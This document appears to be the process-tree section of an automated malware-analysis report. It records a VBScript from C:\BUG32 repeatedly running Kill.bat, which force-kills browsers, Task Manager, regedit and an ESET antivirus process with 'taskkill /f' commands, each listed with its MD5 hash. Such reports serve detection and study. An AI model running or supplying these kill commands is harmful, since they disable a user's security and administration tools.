      • wscript.exe (PID: 7564 cmdline: wscript.exe "C:\BUG32\emptyone.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 7576 cmdline: "C:\Windows\System32\wscript.exe" "C:\bug32\jaq.vbs" RunAsAdministrator MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • cmd.exe (PID: 7580 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\BUG32\Kill.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7852 cmdline: taskkill /f /im chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • conhost.exe (PID: 4500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • conhost.exe (PID: 3960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • conhost.exe (PID: 3936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • conhost.exe (PID: 1368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 2752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • conhost.exe (PID: 5836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • conhost.exe (PID: 1492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 8116 cmdline: taskkill /f /im opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 5404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 2668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7292 cmdline: taskkill /f /im iexplore.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 5564 cmdline: taskkill /f /im msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 1536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 5424 cmdline: taskkill /f /im microsoftedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7372 cmdline: taskkill /f /im notepad.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • conhost.exe (PID: 4440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • conhost.exe (PID: 1268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 2656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 3364 cmdline: taskkill /f /im firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 5356 cmdline: taskkill /f /im mspaint.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 4220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7500 cmdline: taskkill /f /im skype.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 5588 cmdline: taskkill /f /im bing.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 1252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 5864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7540 cmdline: taskkill /f /im eset.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7672 cmdline: taskkill /f /im edge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7864 cmdline: taskkill /f /im taskmgr.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 8144 cmdline: taskkill /f /im regedit.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 3716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7768 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\BUG32\Kill.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 2636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 5744 cmdline: taskkill /f /im chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 3560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 3936 cmdline: taskkill /f /im opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7628 cmdline: taskkill /f /im iexplore.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 3960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7632 cmdline: taskkill /f /im msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7952 cmdline: taskkill /f /im microsoftedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7536 cmdline: taskkill /f /im notepad.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7876 cmdline: taskkill /f /im firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 4128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 4424 cmdline: taskkill /f /im mspaint.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 5404 cmdline: taskkill /f /im skype.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • conhost.exe (PID: 4708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 2252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 2252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7500 cmdline: taskkill /f /im bing.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7476 cmdline: taskkill /f /im eset.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 5448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 3356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • conhost.exe (PID: 3844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 3624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7696 cmdline: taskkill /f /im edge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7748 cmdline: taskkill /f /im taskmgr.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 3648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7808 cmdline: taskkill /f /im regedit.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 2804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 5052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4796 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\BUG32\Kill.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 2352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7904 cmdline: taskkill /f /im chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • conhost.exe (PID: 4164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 1988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 744 cmdline: taskkill /f /im opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 6624 cmdline: taskkill /f /im iexplore.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7364 cmdline: taskkill /f /im msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 1016 cmdline: taskkill /f /im microsoftedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 5380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 3552 cmdline: taskkill /f /im notepad.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 6096 cmdline: taskkill /f /im firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 4088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 2928 cmdline: taskkill /f /im mspaint.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 3976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7796 cmdline: taskkill /f /im skype.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 4912 cmdline: taskkill /f /im bing.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 3276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7636 cmdline: taskkill /f /im eset.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 4444 cmdline: taskkill /f /im edge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 2944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 3168 cmdline: taskkill /f /im taskmgr.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 1220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 3752 cmdline: taskkill /f /im regedit.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • conhost.exe (PID: 3596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7160 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\BUG32\Kill.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7636 cmdline: taskkill /f /im chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 1988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 4508 cmdline: taskkill /f /im opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 3348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7968 cmdline: taskkill /f /im iexplore.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 3852 cmdline: taskkill /f /im msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 2148 cmdline: taskkill /f /im microsoftedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 6612 cmdline: taskkill /f /im notepad.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 6568 cmdline: taskkill /f /im firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 4112 cmdline: taskkill /f /im mspaint.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 4280 cmdline: taskkill /f /im skype.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 2584 cmdline: taskkill /f /im bing.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 6484 cmdline: taskkill /f /im eset.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 1412 cmdline: taskkill /f /im edge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 5312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7332 cmdline: taskkill /f /im taskmgr.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 6804 cmdline: taskkill /f /im regedit.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
